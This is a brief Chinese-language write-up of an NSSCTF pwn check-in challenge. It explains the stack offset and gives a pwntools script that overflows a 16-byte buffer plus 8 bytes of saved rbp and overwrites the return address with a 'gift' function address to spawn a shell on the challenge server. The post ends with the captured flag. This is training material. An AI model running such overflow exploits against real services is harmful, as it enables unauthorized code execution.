按照签到题的套路是找main,buf,shell,bin/sh/,这个是加了一个gift的地址
距离rbp 16字节,我们要再加上我们的8个字节
最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了
from pwn import * p = remote('node4.anna.nssctf.cn',28325) payload = b'a' * 0x10 + b'a' * 8 + p64(0x4005b6) p.send(payload) p.interactive()
NSSCTF{7b6d2d8a-b6a5-4c40-bcdd-f4604c025219}
![BUUCTF [SWPU2019]神奇的二维码 1](https://ucc.alicdn.com/pic/developer-ecology/tycxnpqmgloi4_18104ff2a89b476db0d282faa877a3ba.png?x-oss-process=image/format,webp/resize,h_160,m_lfit)
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解](https://ucc.alicdn.com/pic/developer-ecology/p5p4weppao3em_6196bea7b85e43ae88067b12f480beb1.png?x-oss-process=image/format,webp/resize,h_160,m_lfit)